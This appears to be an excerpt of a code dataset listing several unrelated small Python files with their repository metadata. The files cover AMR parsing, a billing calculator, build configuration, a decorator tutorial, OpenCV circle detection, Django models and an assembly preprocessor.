# if value is in quote, it is a constant value
# strip the quote and put it in attribute map
if v2[1][0] == "\"" and v2[1][-1] == "\"":
attribute_dict[v2[0]] = v2[1][1:-1]
# if value is a node name
elif v2[1] in node_dict:
relation_dict[v2[1]] = v2[0]
else:
attribute_dict[v2[0]] = v2[1]
# each node has a relation map and attribute map
relation_list.append(relation_dict)
attribute_list.append(attribute_dict)
# add TOP as an attribute. The attribute value is the top node value
attribute_list[0]["TOP"] = node_value_list[0]
# print node_name_list
# print node_value_list
# print relation_list
# print attribute_list,'\n\n'
result_amr = AMR(node_name_list, node_value_list, relation_list, attribute_list)
return result_amr
# test AMR parsing
# a unittest can also be used.
if __name__ == "__main__":
if len(sys.argv) < 2:
logger.error("No file given")
exit(1)
amr_count = 1
for line in open(sys.argv[1]):
cur_line = line.strip()
if cur_line == "" or cur_line.startswith("#"):
continue
logger.info("AMR", amr_count)
current = AMR.parse_AMR_line(cur_line)
current.output_amr()
amr_count += 1
| [
"mahnerak@gmail.com"
] | mahnerak@gmail.com |
4c7fa45bccdd601c393212979c83c051cf06b4bd | e045b8b682eb2935deaf9b607d327665430a35d0 | /Basic Programs/electricitybill.py | ceee7f738cae51c46c0f3f2996116935e8526ab1 | [] | no_license | surendhar-code/Python-Programs | bf97a58db94eed9a6a133b0a6eb50ece6428bc96 | cd8116f2b3beb07e84ae7445895f8a94f14d1977 | refs/heads/main | 2023-05-09T21:22:29.155906 | 2021-06-01T04:17:11 | 2021-06-01T04:17:11 | 343,982,016 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | units = int(input("Enter the units consumed : "))
if units <= 100:
amount = units*3.00
elif units <=200:
amount = 3.25*units
elif units <= 500:
amount = 700.00 + 4.60 * (units - 200)
else:
amount = 2080.00 + 6.60 * (units - 500)
print("Units = ",units, " Amount : ",amount) | [
"65447707+surendhar-code@users.noreply.github.com"
] | 65447707+surendhar-code@users.noreply.github.com |
7d78d5177729f5f665749df5e38b164a5b32171a | f7a06c4b919c4ced76f260602c3835bda4c9180e | /config.py | 081924999b26c51c97ed6fc3eaff0391afa72210 | [
"LicenseRef-scancode-us-govt-public-domain",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | eelcovv/proteus | d060c7afcde4a24b119c01f507aaaacc6584314a | 80c4310d2fa43be2c70fe73914425134debd0139 | refs/heads/master | 2021-01-17T22:41:37.863572 | 2015-02-11T23:13:25 | 2015-02-11T23:13:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,162 | py | import os
from os.path import join as pjoin
import sys
prefix = os.getenv('PROTEUS_PREFIX')
if not prefix:
prefix = sys.exec_prefix
PROTEUS_INCLUDE_DIR = pjoin(prefix, 'include')
PROTEUS_LIB_DIR = pjoin(prefix, 'lib')
platform_extra_compile_args = []
platform_extra_link_args = []
platform_blas_h = None
platform_lapack_h = None
platform_lapack_integer = None
if sys.platform == 'darwin':
platform_extra_link_args = ['-framework', 'Accelerate']
platform_lapack_integer = '__CLPK_integer'
platform_blas_h = r'<veclib/cblas.h>'
platform_lapack_h = r'<veclib/clapack.h>'
elif sys.platform == 'linux2':
platform_extra_compile_args = ['-DPETSC_INCLUDE_AS_C']
platform_extra_link_args = ['-Wl,-rpath,' + PROTEUS_LIB_DIR]
platform_blas_h = r'"proteus_blas.h"'
platform_lapack_h = r'"proteus_lapack.h"'
PROTEUS_EXTRA_COMPILE_ARGS= ['-Wall',
'-DF77_POST_UNDERSCORE',
'-DUSE_BLAS',
'-DCMRVEC_BOUNDS_CHECK',
'-DMV_VECTOR_BOUNDS_CHECK'] + platform_extra_compile_args
def get_flags(package):
""" Checks the environment for presence of PACKAGE_DIR
And either returns PACKAGE_DIR/[include, lib] or the Proteus include flags.
This supports building Proteus using packages provides via environment variables.
"""
package_dir_env = os.getenv(package.upper() + '_DIR')
if package_dir_env:
include_dir = pjoin(package_dir_env, 'include')
lib_dir = pjoin(package_dir_env, 'lib')
else:
include_dir = PROTEUS_INCLUDE_DIR
lib_dir = PROTEUS_LIB_DIR
return include_dir, lib_dir
PROTEUS_EXTRA_LINK_ARGS=['-lblas'] + platform_extra_link_args
PROTEUS_EXTRA_FC_COMPILE_ARGS= ['-Wall']
PROTEUS_EXTRA_FC_LINK_ARGS=['-lblas']
PROTEUS_SUPERLU_INCLUDE_DIR, PROTEUS_SUPERLU_LIB_DIR = get_flags('superlu')
PROTEUS_SUPERLU_H = r'"slu_ddefs.h"'
PROTEUS_SUPERLU_LIB = 'superlu_4.1'
PROTEUS_BLAS_INCLUDE_DIR = '.'
if platform_blas_h:
PROTEUS_BLAS_H = platform_blas_h
else:
PROTEUS_BLAS_H = r'"cblas.h"'
PROTEUS_BLAS_LIB_DIR = '.'
PROTEUS_BLAS_LIB = 'blas'
PROTEUS_LAPACK_INCLUDE_DIR = '.'
if platform_lapack_h:
PROTEUS_LAPACK_H = platform_lapack_h
else:
PROTEUS_LAPACK_H = r'"clapack.h"'
PROTEUS_LAPACK_LIB_DIR = '.'
PROTEUS_LAPACK_LIB = 'lapack'
if platform_lapack_integer:
PROTEUS_LAPACK_INTEGER = platform_lapack_integer
else:
PROTEUS_LAPACK_INTEGER = 'int'
PROTEUS_TRIANGLE_INCLUDE_DIR, PROTEUS_TRIANGLE_LIB_DIR = get_flags('triangle')
PROTEUS_TRIANGLE_H = r'"triangle.h"'
PROTEUS_TRIANGLE_LIB ='tri'
PROTEUS_DAETK_INCLUDE_DIR, PROTEUS_DAETK_LIB_DIR = get_flags('daetk')
PROTEUS_DAETK_LIB ='daetk'
PROTEUS_DAETK_LIB_DIRS = [PROTEUS_DAETK_LIB_DIR]
PROTEUS_MPI_INCLUDE_DIR, PROTEUS_MPI_LIB_DIR = get_flags('mpi')
PROTEUS_MPI_INCLUDE_DIRS = [PROTEUS_MPI_INCLUDE_DIR]
PROTEUS_MPI_LIB_DIRS = [PROTEUS_MPI_LIB_DIR]
PROTEUS_MPI_LIBS =[]
PROTEUS_PETSC_INCLUDE_DIR, PROTEUS_PETSC_LIB_DIR = get_flags('petsc')
PROTEUS_PETSC_LIB_DIRS = [PROTEUS_PETSC_LIB_DIR]
PROTEUS_PETSC_LIBS = []
PROTEUS_PETSC_INCLUDE_DIRS = [PROTEUS_PETSC_INCLUDE_DIR]
| [
"aron@ahmadia.net"
] | aron@ahmadia.net |
8523b61b15c1d7c42690069d07d5e2e61b04e428 | 2023fa470a2df0c5feda1f57c87752c80366de83 | /03_函数式编程/06_匿名函数.py | 66c5876953c192dee138821dd476ac3a34e3fdeb | [] | no_license | lmmProject/python_01 | 73d53b2b65cc56db936de765b5b9472dc856f59a | f51d24fb054e970c847e448b6ff176b851e1f9fc | refs/heads/master | 2020-03-18T06:18:51.455204 | 2018-11-10T10:05:43 | 2018-11-10T10:05:43 | 134,387,892 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,538 | py | # 匿名函数
# 当我们在传入函数时,有些时候,不需要显式地定义函数,直接传入匿名函数更方便。
print(list(map(lambda x: x*x, [1, 2, 3, 4, 5])))
# 匿名函数有个限制,就是只能有一个表达式,不用写return,返回值就是该表达式的结果。
f = lambda x : x*x
print(f)
print(f(5))
#装饰器
# 假设我们要增强now()函数的功能,
# 比如,在函数调用前后自动打印日志,但又不希望修改now()函数的定义,
# 这种在代码运行期间动态增加功能的方式,称之为“装饰器”(Decorator)。
# 本质上,decorator就是一个返回函数的高阶函数。
# 所以,我们要定义一个能打印日志的decorator,可以定义如下:
def log(func):
def wrapper(*args, **kw):
print('call %s():' % func.__name__)
return func(*args, **kw)
return wrapper
# 观察上面的log,因为它是一个decorator,所以接受一个函数作为参数,并返回一个函数。
# 我们要借助Python的@语法,把decorator置于函数的定义处:
@log
def now():
print('2015-3-25')
now()
# wrapper()函数的参数定义是(*args, **kw),
# 因此,wrapper()函数可以接受任意参数的调用。在wrapper()函数内,首先打印日志,再紧接着调用原始函数。
# 以上两种decorator的定义都没有问题,但还差最后一步。
# 因为我们讲了函数也是对象,它有__name__等属性,但你去看经过decorator装饰之后的函数,
# 它们的__name__已经从原来的'now'变成了'wrapper':
# >>> now.__name__
# 'wrapper'
# 因为返回的那个wrapper()函数名字就是'wrapper',
# 所以,需要把原始函数的__name__等属性复制到wrapper()函数中,
# 否则,有些依赖函数签名的代码执行就会出错。
# 不需要编写wrapper.__name__ = func.__name__这样的代码,
# Python内置的functools.wraps就是干这个事的,所以,一个完整的decorator的写法如下:
# 针对带参数的decorator:
import functools
def log_fts(text):
def decotator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
print('%s %s():' % (text, func.__name__))
return func(*args, **kw)
return wrapper
return decotator
def now2():
print('2015-3-25')
now2 = log_fts('自定义log文本')(now2)
now2()
# 偏函数
# 在介绍函数参数的时候,
# 我们讲到,通过设定参数的默认值,可以降低函数调用的难度。而偏函数也可以做到这一点。举例如下:
# int()函数可以把字符串转换为整数,当仅传入字符串时,int()函数默认按十进制转换:
print(int('12345'))
print(int('1000000', base=2))
def int2(x, base=2):
return int(x, base)
print(int2('1000000'))
# functools.partial就是帮助我们创建一个偏函数的,
# 不需要我们自己定义int2(),可以直接使用下面的代码创建一个新的函数int2:
import functools
int_two = functools.partial(int, base=2)
print(int_two('1000000'))
# 当传入:
max2 = functools.partial(max, 10)
# 实际上会把10作为*args的一部分自动加到左边,也就是:
f1 = max2(5, 6, 7)
print(f1)
# 相当于:
args = (10, 5, 6, 7)
f2 = max(*args)
print(f2)
# 结果为10。
# 偏函数小结
# 当函数的参数个数太多,需要简化时,使用functools.partial可以创建一个新的函数,
# 这个新函数可以固定住原函数的部分参数,从而在调用时更简单。
| [
"752634866@qq.com"
] | 752634866@qq.com |
d4d1963c6252b5ad2e2682a181032d5405da8128 | 8f9e85d98b89bab6b1ba84c8b11745d4b7fd2d69 | /src/circledetection/circle-detection.py | bfce65700f939d25d6e9b7140f8680e629609d2e | [] | no_license | Echaflo/python_opencv_image_manipulation | 1faaa39ca21d78aed1ada9871e825f6aca563ea6 | 7a0d792de5e5608843cb7ef19f068aab3a83c168 | refs/heads/master | 2023-08-11T22:36:42.217725 | 2019-01-20T07:00:01 | 2019-01-20T07:00:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,039 | py | import numpy as np
import imutils
import cv2
from matplotlib import pyplot as plt
#
bgr_img = cv2.imread('../../resources/omr-imgs/omr-1.png') # read as it is
if bgr_img.shape[-1] == 3: # color image
b, g, r = cv2.split(bgr_img) # get b,g,r
rgb_img = cv2.merge([r, g, b]) # switch it to rgb
gray_img = cv2.cvtColor(bgr_img, cv2.COLOR_BGR2GRAY).copy()
else:
gray_img = bgr_img.copy()
img = cv2.medianBlur(gray_img, 15)
cimg = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
circles = cv2.HoughCircles(img, cv2.HOUGH_GRADIENT, 1, 20, param1=50, param2=30, minRadius=0, maxRadius=0)
circles = np.uint16(np.around(circles))
for i in circles[0, :]:
# draw the outer circle
cv2.circle(cimg, (i[0], i[1]), i[2], (0, 255, 0), 2)
# draw the center of the circle
cv2.circle(cimg, (i[0], i[1]), 2, (0, 0, 255), 3)
plt.subplot(121), plt.imshow(rgb_img)
plt.title('Input Image'), plt.xticks([]), plt.yticks([])
plt.subplot(122), plt.imshow(cimg)
plt.title('Hough Transform'), plt.xticks([]), plt.yticks([])
plt.show()
| [
"asmmahmud@gmail.com"
] | asmmahmud@gmail.com |
d86d741f2fbdcb9846d35a7f23203bd2c06de2c4 | 1c21d0b6bab27159e3cbc7cf2ad7e24b79b47d65 | /bmi/migrations/0004_suggestion.py | e0cc0e2c316ddeb5542331dcd96a97356ed446b5 | [] | no_license | ctijstha/proj | 7fa5ad58cbdacc31f53ec80cdd6d86f51ab6fd76 | 10b9e36f7bf74336e6c7a938294f68bf4815347d | refs/heads/main | 2023-07-11T06:38:18.790931 | 2021-08-02T04:18:58 | 2021-08-02T04:18:58 | 391,814,025 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 680 | py | # Generated by Django 3.1.7 on 2021-04-25 10:16
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bmi', '0003_auto_20210425_1532'),
]
operations = [
migrations.CreateModel(
name='Suggestion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('category', models.CharField(choices=[('Underweight', 'Underweight'), ('Normal', 'Normal'), ('Overweight', 'Overweight'), ('Obese', 'Obese')], max_length=25)),
('message', models.TextField()),
],
),
]
| [
"chitij165@gmail.com"
] | chitij165@gmail.com |
e00fdd7472a73b96d2f82a944a235a269d71e7d1 | 8eeef7742573a8b671648d94e448d5614272c5d6 | /Python3/Employee_Info.py | 2806742ccfad84fb0e73100ca146307f0ba832dc | [] | no_license | damodardikonda/Python-Basics | 582d18bc9d003d90b1a1930c68b9b39a85778ea7 | fd239722fc6e2a7a02dae3e5798a5f1172f40378 | refs/heads/master | 2023-01-28T16:22:19.153514 | 2020-12-11T06:36:49 | 2020-12-11T06:36:49 | 270,733,918 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 610 | py | class Emp_Info():
'''Ky re Zaatya , Madarchod , Lavdya , Chinnal , Randi ,..........'''
def __init__(s , ename ,esal , comp , eid):
s.e1 = ename
s.e2 = int(esal)
s.e3 = comp
s.e4 = eid
def Info(x):
aa = 2
print(aa)
print("My name is %s " %(x.e1))
print(" my sal is %f " %(x.e2))
print("Company name is {} " . format(x.e3))
print("ID is " , x.e4)
print(Emp_Info.__doc__)
help(Emp_Info)
emp1 = Emp_Info("damodar" , 900000.80 , "Own" ," 1")
emp1.Info()
emp2 = Emp_Info("dams" , 880000.80 , "Own" ," 2")
emp2.Info()
| [
""
] | |
2ba363627f58aa5a01f3a6fc9d241a1c6e47de87 | 9d8e2928b026cc4050598f6f9ef59066a8349f61 | /hacking-game/setup.py | e5384aa2feea975aa3e2e0124533607cc5ff5af3 | [] | no_license | davidlyfr/python-learning | 843c1b1ef914fb9e8b2dcdd24135416ef0dcc832 | f6de7dbb0dceb97e52c79008faaa74d8e2569dff | refs/heads/master | 2021-01-15T16:48:09.715946 | 2018-02-20T22:09:16 | 2018-02-20T22:09:16 | 99,727,988 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 503 | py | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
config = [
'description': 'Hacking Game',
'author': 'David Lynch',
'url': 'URL to get it at.',
'download_url': 'Where to download it.',
'author_email': 'davelynch45@gmail.com',
'version': '0.1',
'install_requires': ['nose'],
'packages': ['hackrecon'],
'scripts': [],
'name': 'hackgame'
]
setup(**config)
| [
"davelynch45@gmail.com"
] | davelynch45@gmail.com |
20053c07eb4c7606786ad0eb7bbae67c68b3aaf3 | f20e5f22fa3d5c7c868ea7d1850ca5f78529350d | /string_index.py | 1faeafeceb4f7c7c2a99e39cee823fac26cf6b8e | [] | no_license | KenRishabh/BtechCSE | f40e83f17042d3d49c0c491e612e1138e6974b84 | 1897120b973fc9a342143baefc64ecde126a19f9 | refs/heads/main | 2023-04-27T10:38:02.010519 | 2021-05-06T13:18:37 | 2021-05-06T13:18:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 167 | py | #string indexing
language = "Rishabh"
#position(index number)
#R=0 , -7
#i=1 , -6
#s=2 , -5
#h=3 , -4
#a=4 , -3
#b=5 , -2
#h=6 , -1
print(language[-1]) | [
"noreply@github.com"
] | KenRishabh.noreply@github.com |
5edbe851415c7f12fe01314ef03eec162a7e5354 | 1afa1b1929d1cd463cd9970174dd58ce2ca6eb1e | /configs/deeplabv3plus/deeplabv3plus_r101-d8_512x512_40k_voc12aug.py | 9e3cd3501becb0dd284113d675963a2c474b247b | [
"Apache-2.0"
] | permissive | CAU-HE/CMCDNet | 2328594bf4b883384c691099c72e119b65909121 | 31e660f81f3b625916a4c4d60cd606dcc8717f81 | refs/heads/main | 2023-08-08T17:21:57.199728 | 2023-07-28T07:34:40 | 2023-07-28T07:34:40 | 589,927,845 | 12 | 1 | null | null | null | null | UTF-8 | Python | false | false | 140 | py | _base_ = './deeplabv3plus_r50-d8_512x512_40k_voc12aug.py'
model = dict(pretrained='open-mmlab://resnet101_v1c', backbone=dict(depth=101))
| [
"flyhxn@qq.com"
] | flyhxn@qq.com |
69a3ef5ba87477ee91fea7adbf43cc3563a04e62 | 97f1f0c3c767f5b81d33ab879e4e37809b201660 | /HelloEclipse/python/textReplacement.py | 26565552aa41a6267828fc7fda77b48538197fb0 | [] | no_license | norhanelzanaty92/hello | 7481689d22ffde6cfc7bf3d2c3145239e864e8e8 | 56378da210c14c024c765955f6e19db24e9ccdc9 | refs/heads/master | 2021-01-10T05:45:29.831470 | 2016-04-02T13:19:56 | 2016-04-02T13:19:56 | 55,295,385 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,673 | py | import sys
import re
import os.path
#adding the header to the file
def Addingtofile(Headerfile,ASMfile):
f1=open(Headerfile,'r')
f2=open(ASMfile,'r')
lines1=f1.readlines()
lines2=f2.readlines()
f1.close()
f2.close()
f2=open(ASMfile,'w')
for line in lines1:
f2.write(line)
for line in lines2:
f2.write(line)
f2.close()
def includeFileintoAsm(ImportFile,ASMfile):
Import_File=open(ImportFile,'r')
lines=Import_File.readlines()
Import_File.close()
for line in lines:
match=re.search(r'.import\W+(\w+[.]inc)',line)
if match:
Addingtofile(match.group(1),ASMfile)
else:
None
#adding the equ to file
def findAndReplaceLabel(ASMfile,Labelfile):
Label_File=open(Labelfile, 'r')
lines = Label_File.readlines()
for line in lines:
#\1 is to be reblaced with \2#######################################################################################
match=re.search(r'(\w*)[:](\w*)',line)
if match:
findAndReplaceHelper(match,ASMfile)
else:
None
Label_File.close()
#adding the adresses to the asm
def addingAddresses(Asmfile):
pc=0000
ASM_File=open(Asmfile, 'r')
Label_File=open('out.label','w')
lines = ASM_File.readlines()
ASM_File.close()
ASM_adress=open('out.asmadd','w')
for line in lines:
matchLabel=re.search(r'(\w+:)',line)
match=re.search(r'.org\W+(\d+)',line)
matchEmpty=re.search(r'.org\W+(\d+)',line)
if match:
pc=int(match.group(1),16)
elif matchLabel:
Label_File.write(line.rstrip("\n")+hex(pc)+"\n") ##adding the label to out.label with its currnt address
else:
if len(line.rstrip(r"\n"))>4:
ASM_adress.write(';'+hex(pc)+';'+line)
pc=pc+1
else:
None
ASM_adress.close()
Label_File.close()
#adding the adresses to the asm
def addingLineEndToTheLabel(Asmfile):
ASM_File=open(Asmfile, 'r')
lines = ASM_File.readlines()
ASM_File.close()
ASM_File=open(Asmfile, 'w')
for line in lines:
match=re.search(r'(\w+:)',line)
if match:
ASM_File.write(re.sub(r'(\w+:)',r'\1\n',line))
else:
ASM_File.write(line)
ASM_File.close()
#adding the equ to file
def findAndReplace(ASMfile,EQUfile):
EQU_File=open(EQUfile, 'r')
lines = EQU_File.readlines()
for line in lines:
#\1 is to be reblaced with \2
match=re.search(r'.equ\W+(\w+)\W*(\w*)',line)
if match:
findAndReplaceHelper(match,ASMfile)
else:
None
EQU_File.close()
def findAndReplaceHelper(match,ASMfile):
ASM_File=open(ASMfile, 'r')
ASMLines=ASM_File.readlines()
ASM_File.close()
ASM_File=open(ASMfile, 'w')
for ASMline in ASMLines:
ASM_File.write(re.sub(match.group(1),match.group(2), ASMline))
ASM_File.close()
#dont forget to elemenate the comment
def commentElemenate(file_Name):
open_FileOld = open(file_Name, 'r')
lines = open_FileOld.readlines()
open_FileOld.close()
open_FileNew = open(file_Name, 'w')
for line in lines:
if re.search(r'[//][//].*',line):
open_FileNew.write(re.sub(r'[//][//].*','', line))
elif re.search(r'[;].*',line):
open_FileNew.write(re.sub(r'[;].*','', line))
elif re.search(r'[#].*',line):
open_FileNew.write(re.sub(r'[#].*','', line))
elif re.search(r'[.]device',line):
microType_File=open('out.microType','w')
microType_File.write(line)
microType_File.close();
else:
open_FileNew.write(line)
open_FileNew.close()
# find the .include
def findInclude(file_Name):
open_File = open(file_Name, 'r')
import_File= open('out.import', 'w')
lines = open_File.readlines()
for line in lines:
if re.search(r'[.]import', line):
import_File.write(line)
else:
None
open_File.close()
import_File.close()
#find (.equ) and replace it in the file
def divideFile(file_Name):
open_File = open(file_Name, 'r')
import_File= open('out.import', 'w')
equ_File = open('out.equ', 'w')
asm_File = open('out.asm', 'w')
def_File =open('out.def','w')
lines = open_File.readlines()
for line in lines:
if re.search(r'[.]equ', line):
equ_File.write(line)
elif re.search(r'[.]import', line):
import_File.write(line)
#elif re.search(r'[.]def', line):
# def_File.write(line)
else:
asm_File.write(line)
open_File.close()
import_File.close()
equ_File.close()
asm_File.close()
def_File.close()
# Define a main() function that prints a little greeting.
def main():
# Get the name from the command line, using 'World' as a fallback.
if len(sys.argv) >= 2:
match=re.search(r'[.]asm',sys.argv[1])
if match:
print 'found'
re.search('.asm',sys.argv[1])
file_Name = sys.argv[1]
#file_Name=re.sub('.asm','.mahmoud',file_Name)
print file_Name
if os.path.exists(file_Name):
print 'the file exists'
#here is the start of the prog
findInclude(file_Name)
# Addingtofile('out.import',file_Name)
includeFileintoAsm('out.import',file_Name)
divideFile(file_Name)
commentElemenate('out.import')
#### adding the import file to the asm befor elemenating the comment ##############################
commentElemenate('out.equ')
commentElemenate('out.asm')
##.def finding and replace replace
findAndReplace('out.asm','out.equ')
addingLineEndToTheLabel('out.asm')
addingAddresses('out.asm')
findAndReplaceLabel('out.asmadd','out.label')
else:
print 'the file doesnt exist'
else:
print 'not avalid file it must be .asm'
else:
print 'plz enter the file.asm'
# This is the standard boilerplate that calls the main() function.
if __name__ == '__main__':
main()
| [
"m.mamdooh@mamdooh"
] | m.mamdooh@mamdooh |
020e733c9e884550d43c2b341cebf6129d819ed9 | f01597b46110214c3823e762b0e46455d67930f7 | /multidb_router_app/data_handler.py | 2342ceb8375c703de4c8cc43cd9cb352d16d39ce | [] | no_license | yshlodha/multidb_router | 3f128399391b7a40668117d60d29f7c34d805dc3 | ce7769be4c2b0f10ccec375f72f5fd6dd5fe1e46 | refs/heads/master | 2020-03-10T00:03:13.877376 | 2018-04-11T12:24:58 | 2018-04-11T12:24:58 | 129,072,669 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,233 | py | from .models import *
def get_product_list(user):
"""
:param user:
:return:
"""
product_list = []
try:
dbuser = DatabaseUser.objects.get(user__username=user.username)
dbs = dbuser.databases.all()
for db in dbs:
products = Product.objects.using(db.name).filter(user__id=dbuser.id)
if products:
product_list.append({db.name: products})
except DatabaseUser.DoesNotExist:
return []
return product_list
def get_user_dbs(user):
"""
:param user:
:return:
"""
try:
dbuser = DatabaseUser.objects.get(user__username=user.username)
db_list = [db.name for db in dbuser.databases.all()]
except DatabaseUser.DoesNotExist:
return []
return db_list
def get_dbuser(username):
"""
:param username:
:return:
"""
try:
dbuser = DatabaseUser.objects.get(user__username=username)
except DatabaseUser.DoesNotExist:
return None
return dbuser
def add_product_to_db(user, name, category, database):
"""
:param user:
:param name:
:param category:
:param database:
:return:
"""
try:
dbuser = DatabaseUser.objects.get(user__username=user.username)
product_object = Product(user_id=dbuser.id, category=category, name=name)
product_object.save(using=database)
except DatabaseUser.DoesNotExist:
return False
return True
def get_all_user_products():
"""
:return:
"""
users = []
dbusers = DatabaseUser.objects.filter(user__is_superuser=False)
for dbuser in dbusers:
products = get_product_list(dbuser.user)
if products:
users.append({dbuser.user.username: products})
return users
def delete_product(username, product_id, db):
"""
:param username:
:param product_id:
:param db:
:return:
"""
try:
dbuser = DatabaseUser.objects.get(user__username=username)
except DatabaseUser.DoesNotExist:
return False
try:
product = Product.objects.using(db).get(id=product_id, user__id=dbuser.id)
except Product.DoesNotExist:
return False
product.delete()
return True | [
"yshlodha03@gmail.com"
] | yshlodha03@gmail.com |
f925b0bbc8dff7cade5763ea534cd301ea570730 | d36471a481ff0ff71aa277d14928a48db9b6140b | /melons.py | 1ecfacead0e3930d7b11d129e6adb944e4fa10f5 | [] | no_license | Quynhd07/melons-classes | ca0e47f694cc6337136ca2431f7a856e9135b3ea | f668d5fd97dd7c3a37bd26bbfe2310324fdd388c | refs/heads/master | 2020-12-30T00:40:33.897567 | 2020-02-07T21:05:17 | 2020-02-07T21:05:17 | 238,799,803 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,309 | py | """Classes for melon orders."""
class AbstractMelonOrder():
"""An abstract base class that other Melon Orders inherit from."""
def __init__(self, species, qty):
"""Initialize melon order attributes."""
self.species = species
self.qty = qty
self.shipped = False
def get_total(self):
"""Calculate price, including tax."""
base_price = 5
# if species == christmas melons
if self.species == "Christmas melons":
# multiple base price by 1.5
base_price = base_price * 1.5
total = (1 + self.tax) * self.qty * base_price
return total
def mark_shipped(self):
"""Record the fact than an order has been shipped."""
self.shipped = True
class DomesticMelonOrder(AbstractMelonOrder):
"""A melon order within the USA."""
def __init__(self, species, qty):
"""Initialize melon order attributes."""
super().__init__(species, qty)
self.order_type = "domestic"
self.tax = 0.08
class InternationalMelonOrder(AbstractMelonOrder):
"""An international (non-US) melon order."""
def __init__(self, species, qty, country_code):
"""Initialize melon order attributes."""
super().__init__(species, qty, country_code)
self.country_code = country_code
self.order_type = "international"
self.tax = .15
def get_country_code(self):
"""Return the country code."""
return self.country_code
def get_total(self):
total = super().get_total()
# base_price = 5
# if species == christmas melons
# if self.species == "Christmas melons":
# # multiple base price by 1.5
# base_price = base_price * 1.5
if self.qty < 10:
flat_fee = 3
total = total + flat_fee
return total
class GovernmentMelonOrder(AbstractMelonOrder):
def __init__(self, species, qty):
"""Initialize melon order attributes."""
super().__init__(species, qty)
self.passed_inspection = False
self.tax = 1
# create mark_inspection method
def mark_inspection(self, bool):
if bool == 'passed':
self.passed_inspection = True
return self.passed_inspection
| [
"you@example.com"
] | you@example.com |
136d2a167c8d553bc5631b9273a93ef436f3759d | c8a1b6fba433fd1d685d01e8edc5e25d1263a785 | /lib/python3.7/tempfile.py | 28a0f20e40e5697aa9c8aa046f4cade2f3b75b84 | [] | no_license | eaduart/dmsWeatherStation | b99e35cc78a03ce74714b6052c274580a25defb6 | 52b6f727f808cef8fe9b368d8b421a200f3bc563 | refs/heads/main | 2023-02-07T19:17:52.695403 | 2021-01-02T08:53:17 | 2021-01-02T08:53:17 | 326,067,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 61 | py | /Users/eduarte@us.ibm.com/anaconda3/lib/python3.7/tempfile.py | [
"eduarte@us.ibm.com@Edwards-MacBook-Pro-2.local"
] | eduarte@us.ibm.com@Edwards-MacBook-Pro-2.local |
4776c9684c14116959aaa73abbf7a29bfac6a229 | bdc9a3263ad2f58aa2d3dffde2ce78d3b51c71fd | /Archive/intensive_snn_tests/intensive_snn_tests_16.py | bc02e601e708b874787ccd3d376d7a879fb9b98b | [] | no_license | yjod22/Framework_SNN | 15a7ee783fa50daadf6f28302a55809def7ec3c3 | 7beec46414745d59a5d7a59395bd6447bed4a58a | refs/heads/master | 2022-04-07T07:54:36.731178 | 2020-02-20T14:32:07 | 2020-02-20T14:32:07 | 188,841,720 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,419 | py | #
###############################################################################
# #
# Copyright (c) #
# All rights reserved. #
# #
###############################################################################
#
# Filename: intensive_snn_tests.py
#
###############################################################################
# Description:
#
# (For a detailed description look at the object description in the UML model)
#
###############################################################################
# History
################################################################################
# File: intensive_snn_tests.py
# Version: 8.0
# Author/Date: Junseok Oh / 2019-05-23
# Change: snLength: 4096
# Conv(2, 4x4), activation function(tanh(0.7x)), Conv(3, 4x4), activation function(tanh(0.7x)),
# maxPooling(2x2), Dense(100), activation function(relu), Dense(10), activation function(softmax)
# Stochastic Conv(APC+BTanh), Stochastic Conv(APC+BTanh), Stochastic Dense(APC mode+Relu), BinaryConnectedLAyer
# (SCR_V6.4-1): NN Optimization-JSO (Make use of listIndex not to consider zero weights in addition)
# (SCR_V6.4-4): Create SaveInTxtFormat function
# Cause: -
# Initiator: Junseok Oh
################################################################################
# File: intensive_snn_tests.py
# Version: 6.4
# Author/Date: Junseok Oh / 2019-03-24
# Change: snLength: 4096
# Conv(2, 4x4), activation function(tanh(0.7x)), Conv(3, 4x4), activation function(tanh(0.7x)),
# maxPooling(2x2), Dense(100), activation function(relu), Dense(10), activation function(softmax)
# Stochastic Conv(APC+BTanh), Stochastic Conv(APC+BTanh), Stochastic Dense(APC mode+Relu), BinaryConnectedLAyer
# Cause: Need short description for this file
# Initiator: Junseok Oh
################################################################################
# File: intensive_snn_tests.py
# Version: 6.1 (SCR_V6.0-5)
# Author/Date: Junseok Oh / 2019-01-31
# Change: Save the intermediate results in the txt format
# Refer to the following website
# https://stackoverflow.com/questions/3685265/how-to-write-a-multidimensional-array-to-a-text-file/3685295
# Cause: Need to extract the intermediate results
# Initiator: Florian Neugebauer
################################################################################
# File: intensive_snn_tests.py
# Version: 6.1 (SCR_V6.0-4)
# Author/Date: Junseok Oh / 2019-01-31
# Change: Delete the object when it is not needed anymore
# Cause: Need to handle the memory leakage issue during runtime
# Initiator: Florian Neugebauer
################################################################################
# File: intensive_snn_tests.py
# Version: 6.0 (SCR_V5.4-2)
# Author/Date: Junseok Oh / 2019-01-05
# Change: This software is branched from v6.0-PreV07-hybrid_cnn_passau.py
# Cause: Intensive Stochastic Neural Network tests
# Initiator: Florian Neugebauer
###############################################################################
import keras
from keras.datasets import mnist
from keras.models import Sequential, Model
from keras.layers import Dense, Dropout, Flatten, Activation
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K
import WeightScaling_large
from keras.utils.generic_utils import get_custom_objects
import numpy as np
from snn.holayer import HOModel, HOMaxPoolingExact, HOMaxPoolingAprox, HOConvolution, HOConnected
